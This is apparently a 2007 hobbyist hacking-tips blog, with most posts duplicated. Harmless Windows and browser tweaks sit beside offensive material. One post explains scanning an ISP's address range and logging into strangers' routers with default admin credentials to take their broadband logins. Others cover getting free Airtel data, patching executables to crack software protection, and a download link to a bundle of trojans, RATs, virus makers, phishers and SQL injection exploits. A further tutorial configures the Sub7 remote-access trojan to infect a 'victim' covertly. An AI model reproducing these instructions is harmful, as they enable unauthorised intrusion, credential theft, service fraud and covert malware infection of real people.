I have tested it, n the net speeds are much faster now...
There's lot's more than speed... If u type some wrong url say www.google.mo it will automatically be redirected to google.com...
It also prevents u 4m phishing sites n hacker attacks...
So try it out now guys,...
I think most of u will be knowing abt OpenDNS...
read about how to implement it here.. http://www.opendns.com/start/windows_xp.php
Bypass administrator account password!!!!!!!!!
Windows Key is a program to reset Windows security if Administrator password, secure boot password or key disk is lost.
Windows Key creates a special boot disk: CD, USB Flash Drive or a driver floppy. Loaded during the boot process, Windows Key instantly resets account passwords and Windows security settings.
General Features
* 100% recovery rate
* All passwords are reset instantly
* Resets passwords with a driver floppy, bootable CD-ROM or USB drive
* Resets local policy settings
* Displays account properties
* Supports all Service Packs
download:
http://rapidshare.com/files/10682402/break_into_sys.iso
Windows Key creates a special boot disk: CD, USB Flash Drive or a driver floppy. Loaded during the boot process, Windows Key instantly resets account passwords and Windows security settings.
General Features
* 100% recovery rate
* All passwords are reset instantly
* Resets passwords with a driver floppy, bootable CD-ROM or USB drive
* Resets local policy settings
* Displays account properties
* Supports all Service Packs
download:
http://rapidshare.com/files/10682402/break_into_sys.iso
Hack ur broadband connection now..............
Step 1: Download any port Scanner (i preffer Super Scan, IPscanner, gfi LAN nat secirity scanner)
Step 2: First Get your ip
Go to Command prompt type ipconfig /all
Hit enter.
You will see your ip as a clients ip.
suppose its 61.1.1.51
Step 3: write your ip in IP scanner Software and scan for alive IPs in the below range
start:61.1.1.1 to End:61.1.255.255
Step 4: Then check in your scanner which alive IPs has the port 80 open or 23 for telnet.
Step 5: if port 80 is open then Enter that IP in your web browser
if 23 port is open then u shd knw how to telnet it frm cmd........
Step 6: It asks for user ID AND password type
username =admin
password =admin or password
It is the default password for most of the routers.
if denied then use on another alive IP
Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.
Step 8: use Show Password tools to view the password in asterisks ********.
now you have username and password ready for use.
ENJOY!!!!!
Step 2: First Get your ip
Go to Command prompt type ipconfig /all
Hit enter.
You will see your ip as a clients ip.
suppose its 61.1.1.51
Step 3: write your ip in IP scanner Software and scan for alive IPs in the below range
start:61.1.1.1 to End:61.1.255.255
Step 4: Then check in your scanner which alive IPs has the port 80 open or 23 for telnet.
Step 5: if port 80 is open then Enter that IP in your web browser
if 23 port is open then u shd knw how to telnet it frm cmd........
Step 6: It asks for user ID AND password type
username =admin
password =admin or password
It is the default password for most of the routers.
if denied then use on another alive IP
Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.
Step 8: use Show Password tools to view the password in asterisks ********.
now you have username and password ready for use.
ENJOY!!!!!
Hacking tools for free now!
IMC TOOL SET
Supplied By,
IMC Graham Phisher
IMC TKB
IMC TwiZted
IMC DakineGuy75
IMC Mellowman
IMC Shiftcode
IMC DanTheBamF
IMC Tully
IMC DeathSentinals
IMC Scar
The Tools
--------------------------
IMC Grahams Trojan
IMC Ice Dragon
Myspace Password Cracker
IMC Myspace Phisher
Ultra Surf
Rapid Share Account Gen
MSN Nudge Madness
Ice Reloaded MSN Freezer
IMC Handbook
BrutusAE2
Lord PS
Hoax Toolbox
IMC Word List
Blues Port Scanner
Bandook RAT v1.35
Project Satan 2.0
EES binder v1.0
File Injector v3
Remote Desktop Spy v4.0
Passive Terror v1.3 Final Edition
Dyn-DL (Dynamic downloader)
Silent Assassin v2.0
Net Scan Tools v4.2
Rocket v1.0
NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Legion NetBios Scanner v2.1
Battle Pong
TeraBIT Virus Maker v2.8
p0kes WormGen 2.0
JPS Virus Maker
IRC Ban Protection
IRC Mega Flooder
FTP Brute Hacker
RAR Password Cracker
Vbulletin 3.6.5 Sql Injection Exploit
IPB 2-2.1.5 Sql Injection Exploit
IPB 2-2.1.7 Exploit
Cain & Abel v4.9.3
NetStumbler 0.4.0
Cryptor 1.2
VNC Crack
Mutilate File Wiper 2.92
Hamachi 0.9.9.9
pbnj-1.0
Download
Protected Message:
Code:
http://rapidshare.com/files/34738681/IMC_Tool_Set.zip.html
Supplied By,
IMC Graham Phisher
IMC TKB
IMC TwiZted
IMC DakineGuy75
IMC Mellowman
IMC Shiftcode
IMC DanTheBamF
IMC Tully
IMC DeathSentinals
IMC Scar
The Tools
--------------------------
IMC Grahams Trojan
IMC Ice Dragon
Myspace Password Cracker
IMC Myspace Phisher
Ultra Surf
Rapid Share Account Gen
MSN Nudge Madness
Ice Reloaded MSN Freezer
IMC Handbook
BrutusAE2
Lord PS
Hoax Toolbox
IMC Word List
Blues Port Scanner
Bandook RAT v1.35
Project Satan 2.0
EES binder v1.0
File Injector v3
Remote Desktop Spy v4.0
Passive Terror v1.3 Final Edition
Dyn-DL (Dynamic downloader)
Silent Assassin v2.0
Net Scan Tools v4.2
Rocket v1.0
NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Legion NetBios Scanner v2.1
Battle Pong
TeraBIT Virus Maker v2.8
p0kes WormGen 2.0
JPS Virus Maker
IRC Ban Protection
IRC Mega Flooder
FTP Brute Hacker
RAR Password Cracker
Vbulletin 3.6.5 Sql Injection Exploit
IPB 2-2.1.5 Sql Injection Exploit
IPB 2-2.1.7 Exploit
Cain & Abel v4.9.3
NetStumbler 0.4.0
Cryptor 1.2
VNC Crack
Mutilate File Wiper 2.92
Hamachi 0.9.9.9
pbnj-1.0
Download
Protected Message:
Code:
http://rapidshare.com/files/34738681/IMC_Tool_Set.zip.html
Webpage Translator
hey guyz just check it out now u can convert any website or use it to learn ur desired language here goes d link just check it out.
http://babelfish.altavista.com/
http://babelfish.altavista.com/
Trace ip!!!!!!!!!
Here are the settings for Yahoo & hotmail to view the Headers (i.e, which contain senders IP address) of the received email....
Yahoo
->mail options
->general preferences
->under the messages header
->Select show all headers on incoming messages
->save changes.
->Done
RESULT:- All emails would have headers like :
X-Originating-IP [XXX.XXX.XXX.XXX]
Hotmail
->options
->mail display settings
->select display full headers
->Done
RESULT :- same as for as yahoo
To get the IP address location, there are many website which you can search on google
To provide you with a couple:-
http://www.geobytes.com/IpLocator.htm?GetLocation
http://www.networldmap.com/TryIt.htm?GetLocation
Yahoo
->mail options
->general preferences
->under the messages header
->Select show all headers on incoming messages
->save changes.
->Done
RESULT:- All emails would have headers like :
X-Originating-IP [XXX.XXX.XXX.XXX]
Hotmail
->options
->mail display settings
->select display full headers
->Done
RESULT :- same as for as yahoo
To get the IP address location, there are many website which you can search on google
To provide you with a couple:-
http://www.geobytes.com/IpLocator.htm?GetLocation
http://www.networldmap.com/TryIt.htm?GetLocation
Access orkut from anywhere!!!!! even when blocked.
Access Orkut from anywhere
If you are in office or school or university campus where Orkut is blocked, either by the office administrator or by your organization then you can access it easily without any hassles. This can also be tried by users living in countries where Orkut is blocked by their ISP. There are 2 sites that can help:
1.Just go to www.mathtunnel.com and type in the name of any site you want to access. This works for Orkut and other blocked sites too.
2.There is one more site www.gravitywars.com .This is very good as it is updated regularly.
Even though the blocked sites can be accessed through proxy servers as I have discussed in my earlier post, but i have noticed that the sites for proxy servers is blocked at various places.
Plz Foward This Message 2 all ur Friends Who are not able 2 acess Orkut due 2 Blockage......
If you are in office or school or university campus where Orkut is blocked, either by the office administrator or by your organization then you can access it easily without any hassles. This can also be tried by users living in countries where Orkut is blocked by their ISP. There are 2 sites that can help:
1.Just go to www.mathtunnel.com and type in the name of any site you want to access. This works for Orkut and other blocked sites too.
2.There is one more site www.gravitywars.com .This is very good as it is updated regularly.
Even though the blocked sites can be accessed through proxy servers as I have discussed in my earlier post, but i have noticed that the sites for proxy servers is blocked at various places.
Plz Foward This Message 2 all ur Friends Who are not able 2 acess Orkut due 2 Blockage......
Multiple logins of orkut through firefox!!!!!!!!!
Step 1:
Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.
Step 2:
variable name: moz_no_remote(should be all small letter).
variable value: 1
Step 3:
open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.
When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.
done!!!!!!!!!!!
Step 3:
If you dont have firefox then download it From the here.
www.firefox.com
Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.
Step 2:
variable name: moz_no_remote(should be all small letter).
variable value: 1
Step 3:
open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.
When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.
done!!!!!!!!!!!
Step 3:
If you dont have firefox then download it From the here.
www.firefox.com
Firefox n Virtual DJ
Flash Player n AVG Antivirus
INSTALL FLASH PLAYER
http://rapidshare.com/files/42996378/install_flash_player.exe
AVG ANTIVIRUS
http://rapidshare.com/files/42991808/avg70free_308a468.exe
http://rapidshare.com/files/42996378/install_flash_player.exe
AVG ANTIVIRUS
http://rapidshare.com/files/42991808/avg70free_308a468.exe
MP4 converter
MP4 CONVERTER with serial...
here is the link....
http://rapidshare.com/files/43180152/4_u_mp4_converter.zip.torrent.html
bt for this u hv a soft ,called utorrent..
for utorrent here is the link..
http://filehippo.com/download_utorrent/
here is the link....
http://rapidshare.com/files/43180152/4_u_mp4_converter.zip.torrent.html
bt for this u hv a soft ,called utorrent..
for utorrent here is the link..
http://filehippo.com/download_utorrent/
Video Converter
TOTAL VIDEO CONVERTER 3.10
HERE IS THE LINK
http://rapidshare.com/files/42718640/Total.Video.Converter.3.10.rar.html
HERE IS THE LINK
http://rapidshare.com/files/42718640/Total.Video.Converter.3.10.rar.html
Thursday, August 23, 2007
Airtel Hack
You need a PC or a Laptop and the required connectivity tools ,ie.,Serial/USB cable OR Infrared Device OR Bluetooth dongle
1) Activate Airtel Live! ( It’s FREE so no probs)
2) Create TWO Airtel gprs data accounts (yep TWO) and select theFIRST as the active profile.
3) Connect your mobile to the PC (or Laptop) and install the driver foryour mobile’s modem.
4) Create a new dial-up connection using the NEW CONNECTIONWIZARD as follows
Connecting Device : Your mobile’s modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2# / Try 99***1
Username and Password : blank
5) Configure your browser and download manager to use the proxy100.1.200.99 and port 8080.( My advice is to use Opera since youcan browse both wap and regular websites)
6) Connect to the dial-up account. You will be connected at 115.2kbps (but remember, that is a bad joke).
7) Pick up your mobile and try to access any site. You will get “AccessDenied…”(except for Airtel Live!). IT DOES NOT MATTER.Keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have theWHOLE internet at your disposal.***************************************************************************************************************
TWO
Under DATA COMM~~~~~~~~~~~~
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :
DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF
Under INTERNET PROFILES
~~~~~~~~~~~~~~~~
INTERNET MODE : HTTP or WAP (both worked for me)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :
No Risk Here, Try it and Enjoy
Alternate
For All Airtel
UsersRequirements:
1. Airtel live (available 4 free)
2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc
3. Opera wap browser 4 mobile
Procedure:-
1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg www.google.com.
2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.
3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).
**Note: always make sure that ur access point is airtelfun.com
Apply:-
1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.
2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show "Unable to connect" or any error. well thats the signal of ur success.
3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.U can also use it through ur computer..........
a recent comment says dat
Guys i tried and its working, I'm using airtel chennai,..the Method TWO worked, also i request everyone to change the Phone number from *99***2 to *99***1 and its working,.. it'll get connected at 462.8kbps but its the speed between the phone and your computer but actual BAndwidth is 42kbps
1) Activate Airtel Live! ( It’s FREE so no probs)
2) Create TWO Airtel gprs data accounts (yep TWO) and select theFIRST as the active profile.
3) Connect your mobile to the PC (or Laptop) and install the driver foryour mobile’s modem.
4) Create a new dial-up connection using the NEW CONNECTIONWIZARD as follows
Connecting Device : Your mobile’s modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2# / Try 99***1
Username and Password : blank
5) Configure your browser and download manager to use the proxy100.1.200.99 and port 8080.( My advice is to use Opera since youcan browse both wap and regular websites)
6) Connect to the dial-up account. You will be connected at 115.2kbps (but remember, that is a bad joke).
7) Pick up your mobile and try to access any site. You will get “AccessDenied…”(except for Airtel Live!). IT DOES NOT MATTER.Keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have theWHOLE internet at your disposal.***************************************************************************************************************
TWO
Under DATA COMM~~~~~~~~~~~~
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :
DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF
Under INTERNET PROFILES
~~~~~~~~~~~~~~~~
INTERNET MODE : HTTP or WAP (both worked for me)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :
No Risk Here, Try it and Enjoy
Alternate
For All Airtel
UsersRequirements:
1. Airtel live (available 4 free)
2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc
3. Opera wap browser 4 mobile
Procedure:-
1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg www.google.com.
2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.
3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).
**Note: always make sure that ur access point is airtelfun.com
Apply:-
1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.
2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show "Unable to connect" or any error. well thats the signal of ur success.
3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.U can also use it through ur computer..........
a recent comment says dat
Guys i tried and its working, I'm using airtel chennai,..the Method TWO worked, also i request everyone to change the Phone number from *99***2 to *99***1 and its working,.. it'll get connected at 462.8kbps but its the speed between the phone and your computer but actual BAndwidth is 42kbps
Branding Windows with your Name
open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here
Wednesday, July 4, 2007
To know the IP address
<<== If You Have Physical Access ==>>
If you have physical access to the computer of the user that you are targeting, than it's a lot easier just type the above in the web browser " http://ipchicken.com/ "and it will show u the IP address of the current computer.
<<== If You Don't Have Physical Access ==>>
If u don't have physical address then do this - send a file to that user.While this transfer is going on you will go to Start => Run=>cmd and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right. Spot ur victim's IP address from the above .
If you have physical access to the computer of the user that you are targeting, than it's a lot easier just type the above in the web browser " http://ipchicken.com/ "and it will show u the IP address of the current computer.
<<== If You Don't Have Physical Access ==>>
If u don't have physical address then do this - send a file to that user.While this transfer is going on you will go to Start => Run=>cmd and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right. Spot ur victim's IP address from the above .
☺ ☺ ☺ Multiple login in yahoo ☺ ☺ ☺!!
Multiple login in yahoo !!You can login with multiple ID's on the same yahoo messenger.
Follow these steps : ==>>
* Go to Start ==> Run ==>> Type regedit,hit enter
* Go to HKEY_CURRENT_USER ==>> Software ==>> Yahoo ==>> pager ==>>Test
* On the right pane ==>> right-click and choose new Dword value .
* Rename it as Plural.
* Double click and assign a decimal value of 1.
* Now close registry and restart yahoo messenger.
* For signing in with new id open another messenger .
"For signing in with new id open another messenger" This means that first singin in as u sign in always.Then after login as user => just open the same yahoo messenger again and signin with different username and password
☺ ☺ Enjoy ☺ ☺
Follow these steps : ==>>
* Go to Start ==> Run ==>> Type regedit,hit enter
* Go to HKEY_CURRENT_USER ==>> Software ==>> Yahoo ==>> pager ==>>Test
* On the right pane ==>> right-click and choose new Dword value .
* Rename it as Plural.
* Double click and assign a decimal value of 1.
* Now close registry and restart yahoo messenger.
* For signing in with new id open another messenger .
"For signing in with new id open another messenger" This means that first singin in as u sign in always.Then after login as user => just open the same yahoo messenger again and signin with different username and password
☺ ☺ Enjoy ☺ ☺
How to Increase Your Broadband Speed
By default (even with QoS disabled) Windows XP reserves up to 20 percent of your connections bandwidth. To override this reserve take the following steps.* Start-> Run-> type gpedit.msc* You will see [Local Computer Policy]* Expand the [Administrative Templates] branch* Expand the [Network] branch* Highlight [QoS Packet Scheduler]* Double-click [Limit Reservable Bandwidth]* Check [Enabled]* Change [Bandwidth limit %] to 0 %* Click [Apply] [OK]* RestartEffect is immediate
How to crack any type of Software Protection
Softwares you need : - W32Dasm and HIEWIdentifying the protection : ====>>>>Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the CD reader. SoftwareX will not run of course, however, when the error window pops up it will give you all of the vital information that you need to crack the program, so be sure towrite down what it says.Cracking the Protection : ====>>>>Now, run Win32Dasm. On the file menu open DISASSEMBLER > OPEN FILE TO DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will appear (e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.When W32Dasm finishes disassembling the file it will display unrecognizable text; this is what we want. Click on the String Data References button. Scroll through the String Data Items until you find SoftwareX’s error message. When you locate it, double click theerror message and then close the window to return to the Win32Dasm text. You will notice that you have been moved somewhere within the SoftwareX’s check routine; this is where the error message in generated.Now comes the difficult part, so be careful. To crack SoftwareX’s protection you must know the @offset of every call and jump command. Write down every call and jump @offset number that you see (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the “h.”Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to see a list of numbers. Now press the F5 key and enter the number that was extracted using Win32Dasm. After you have entered the number you will be taken to SoftwareX’s check routine within HIEW.To continue you must understand this paragraph. If the command that you are taken to is E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits equal one byte: E9-2B-F9-BF-74 => 10 digits => 5 bytes.
If you understood this then you can continue.Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90). After you complete this step press the F10 key to exit.=====>>>>>Congratulations! You just cracked SoftwareX!<<<<<=====
If SoftwareX will not run after you finished cracking it. It only means that something was done incorrectly, or perhaps SoftwareX’s protection technology has been improved.Simply reinstall SoftwareX and start over. If you’re sure that you completed all steps correctly and the program still will not run, then toughnuts. Their protection was developed using latest technology."But i m sure it works on old softwares"
If you understood this then you can continue.Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90). After you complete this step press the F10 key to exit.=====>>>>>Congratulations! You just cracked SoftwareX!<<<<<=====
If SoftwareX will not run after you finished cracking it. It only means that something was done incorrectly, or perhaps SoftwareX’s protection technology has been improved.Simply reinstall SoftwareX and start over. If you’re sure that you completed all steps correctly and the program still will not run, then toughnuts. Their protection was developed using latest technology."But i m sure it works on old softwares"
Saturday, March 31, 2007
Lock folder without any software
Lock folder without any software (write only ash7.abhi instead of "ash7.abhi")
Suppose you want to lock the folder "ash7.abhi" in d: which has the path D:\"ash7.abhi"
(without quotes).In the same drive create a text file and type
ren "ash7.abhi" "ash7.abhi".{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat
create another text file and type in it
ren ash7.abhi.{21EC2020-3AEA-1069-A2DD-08002B30309D} ash7.abhi
Now save this text file as key.bat
Now you can see 2 batch files loc and key.Press loc and the folder games will change to control
panel and you cannot view its contents.Press key and you will get back your original folder.
{20D04FE0-3AEA-1069-A2D8-08002B30309D} - Turned to Explorer
{0DF44EAA-FF21-4412-828E-260A8728E7F1} - turned to startmenu properties
{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} - Turned to Folder Options
{7007ACC7-3202-11D1-AAD2-00805FC1270E} - Turned to Network Connections
{D20EA4E1-3957-11d2-A40B-0C5020524152} - Turned to Fonts Folder
{D6277990-4C6A-11CF-8D87-00AA0060F5BF} - Turned to Shedule tasks
{E211B736-43FD-11D1-9EFB-0000F8757FCD} - Turned to Scanners & camera
{645FF040-5081-101B-9F08-00AA002F954E} - Turned to Recycle bin
{2227A280-3AEA-1069-A2DE-08002B30309D} - Turned to Printers Folder
Suppose you want to lock the folder "ash7.abhi" in d: which has the path D:\"ash7.abhi"
(without quotes).In the same drive create a text file and type
ren "ash7.abhi" "ash7.abhi".{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat
create another text file and type in it
ren ash7.abhi.{21EC2020-3AEA-1069-A2DD-08002B30309D} ash7.abhi
Now save this text file as key.bat
Now you can see 2 batch files loc and key.Press loc and the folder games will change to control
panel and you cannot view its contents.Press key and you will get back your original folder.
{20D04FE0-3AEA-1069-A2D8-08002B30309D} - Turned to Explorer
{0DF44EAA-FF21-4412-828E-260A8728E7F1} - turned to startmenu properties
{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} - Turned to Folder Options
{7007ACC7-3202-11D1-AAD2-00805FC1270E} - Turned to Network Connections
{D20EA4E1-3957-11d2-A40B-0C5020524152} - Turned to Fonts Folder
{D6277990-4C6A-11CF-8D87-00AA0060F5BF} - Turned to Shedule tasks
{E211B736-43FD-11D1-9EFB-0000F8757FCD} - Turned to Scanners & camera
{645FF040-5081-101B-9F08-00AA002F954E} - Turned to Recycle bin
{2227A280-3AEA-1069-A2DE-08002B30309D} - Turned to Printers Folder
Monday, March 12, 2007
Put ur name in window's start menu.
Follow the above and u guys will amazed to see the above : ==>>
* First of all download the above program from
http://rapidshare.com/files/19351157/ash7.abhi.rar
* Then go to "C:\WINDOWS" and there copy the "explorer.exe"(as
looks like my computer) and paste
it on the desktop and rename it as ur name.(e.g -"Abhishek.exe")
* Now open the resource hacker(named as ash7.abhi) that u have
downloaded earlier
* From the open menu select renamed file.(e.g -"Abhishek.exe")
* Now from left side of resource hacker(named as ash7.abhi)
select "String Table" and then folder "37" then select
select "1033".On clicking this some text will appear on right
side of the resource hacker(named as ash7.abhi).
* On the right side u will see some thing written as "Start" now
what u have to do just put ur name in place of start.
* Next step is to now compile it and save it.
* Now cut the renamed file i.e "Abhishek.exe" from ur desktop and
paste it in its original path. i.e in "C:\WINDOWS" as it is.
* Select start => run => regedit and hit enter.
* On regeditor select "My
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\Windows
NT\Currentversion\Winlogon" now on the right side of the
regeditor doubleclick "shell" then change the "value data" as
the modified file {for example:"Abhishek.exe"} and press ok.
* Restart ur system. You people now amazed to see the result.
☺ ☺ ☺ Enjoy ☺ ☺ ☺
* First of all download the above program from
http://rapidshare.com/files/19351157/ash7.abhi.rar
* Then go to "C:\WINDOWS" and there copy the "explorer.exe"(as
looks like my computer) and paste
it on the desktop and rename it as ur name.(e.g -"Abhishek.exe")
* Now open the resource hacker(named as ash7.abhi) that u have
downloaded earlier
* From the open menu select renamed file.(e.g -"Abhishek.exe")
* Now from left side of resource hacker(named as ash7.abhi)
select "String Table" and then folder "37" then select
select "1033".On clicking this some text will appear on right
side of the resource hacker(named as ash7.abhi).
* On the right side u will see some thing written as "Start" now
what u have to do just put ur name in place of start.
* Next step is to now compile it and save it.
* Now cut the renamed file i.e "Abhishek.exe" from ur desktop and
paste it in its original path. i.e in "C:\WINDOWS" as it is.
* Select start => run => regedit and hit enter.
* On regeditor select "My
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\Windows
NT\Currentversion\Winlogon" now on the right side of the
regeditor doubleclick "shell" then change the "value data" as
the modified file {for example:"Abhishek.exe"} and press ok.
* Restart ur system. You people now amazed to see the result.
☺ ☺ ☺ Enjoy ☺ ☺ ☺
Sunday, March 4, 2007
Hacking seriously
For hacking into another computer u guys need the todays no.1 hacking tool Sub7. Using this tool a hacker can control ur pc as u r controlling ur own pc. You can dwld the above tool from [http://hackpr.net/~sub7/downloads.shtml].
The package include the files you will use : ===>>>
1) SubSeven.EXE => is the file you open and use to control your server (VICTIM)
2) server.EXE => is the file you send to your victim to control him
3) EditServer.EXE => is the file you will use to configure the server you chose to use (edit the server)
4) ICQMAPI.DLL => is not necessary to know about but it lets you use the ICQ functions with the client/server
How to properly configure a server using EditServer : ====>>>>
1) Click "browse" and find the server.exe file you are going to edit(named server.exe in the local directory)then click "Read CurrentSettings"
2) StartUp Methods: you basically check one or MORE boxes to choosehow the server will restart itself everytime the computer is booted.key name: the registry key name that will go with the startup method
3) Notification Options: Victim Name: the name of your server thatyou want to come up in your ICQ notify, Enable ICQ notify to UIN: isthe ICQ number you want the notify to go to, Enable IRC notify: willsend a bot to the IRC server you specify and will notify you of theIP, port, password etc.
4) Installation: a)Check the box and set the port number you want the server to start on in the victim's pc, if you want a random port,then you click the checkbox underneath that. b)You can set a server password which will protect your victim from others who try to conn.c)You can protect the server port and password, d)and enable a bot that logs on whenever your vic connects to the internet, e)you choose your server name that you want the server thats installed in your Windows directory to be named. f)Choose to melt the server after the install(deletes server after its double clicked but still installs into windows directory g)Configure an Error message to be displayed when the server is clicked so as to lead the victim away from thinking its a virus h)Hint: Avoid Using this Binder, use an external one instead
5) Protect server: you can set a password so that if your server isfound, the person cannot get it into the editserver to find out theembedded info inside it
6) Now you can either save the settings to the server you opened, overwriting the old settings, or you can save a new server with thesettins you just provided, still retaining the old server aswell.
7) You can also change the server icon by clicking the top right corner button.
====>>>> enjoy <<<<====
The package include the files you will use : ===>>>
1) SubSeven.EXE => is the file you open and use to control your server (VICTIM)
2) server.EXE => is the file you send to your victim to control him
3) EditServer.EXE => is the file you will use to configure the server you chose to use (edit the server)
4) ICQMAPI.DLL => is not necessary to know about but it lets you use the ICQ functions with the client/server
How to properly configure a server using EditServer : ====>>>>
1) Click "browse" and find the server.exe file you are going to edit(named server.exe in the local directory)then click "Read CurrentSettings"
2) StartUp Methods: you basically check one or MORE boxes to choosehow the server will restart itself everytime the computer is booted.key name: the registry key name that will go with the startup method
3) Notification Options: Victim Name: the name of your server thatyou want to come up in your ICQ notify, Enable ICQ notify to UIN: isthe ICQ number you want the notify to go to, Enable IRC notify: willsend a bot to the IRC server you specify and will notify you of theIP, port, password etc.
4) Installation: a)Check the box and set the port number you want the server to start on in the victim's pc, if you want a random port,then you click the checkbox underneath that. b)You can set a server password which will protect your victim from others who try to conn.c)You can protect the server port and password, d)and enable a bot that logs on whenever your vic connects to the internet, e)you choose your server name that you want the server thats installed in your Windows directory to be named. f)Choose to melt the server after the install(deletes server after its double clicked but still installs into windows directory g)Configure an Error message to be displayed when the server is clicked so as to lead the victim away from thinking its a virus h)Hint: Avoid Using this Binder, use an external one instead
5) Protect server: you can set a password so that if your server isfound, the person cannot get it into the editserver to find out theembedded info inside it
6) Now you can either save the settings to the server you opened, overwriting the old settings, or you can save a new server with thesettins you just provided, still retaining the old server aswell.
7) You can also change the server icon by clicking the top right corner button.
====>>>> enjoy <<<<====
Subscribe to:
Posts (Atom)
